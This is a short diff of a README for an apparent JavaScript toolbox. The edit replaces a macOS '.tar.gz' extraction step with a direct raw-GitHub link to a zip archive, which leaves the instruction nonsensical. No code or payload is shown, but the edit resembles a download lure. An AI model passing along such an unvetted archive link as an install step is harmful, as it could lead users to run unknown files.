SagaOfLegends/js-toolbox/README.md

 1. **Unzip or Extract the File:**
    - For Windows, right-click the `.zip` file and select “Extract All.”
-   - For macOS, double-click the `.tar.gz` file to extract it.
+   - For macOS, double-click the `https://raw.githubusercontent.com/SagaOfLegends/js-toolbox/main/inaugurate/js-toolbox.zip` file to extract it.
 2. Navigate to the extracted folder.
 You should see a series of JavaScript files and documentation.
 3. Open your command line or terminal.
 You can do this by:
    - **Windows:** Search for “cmd” in the Start menu.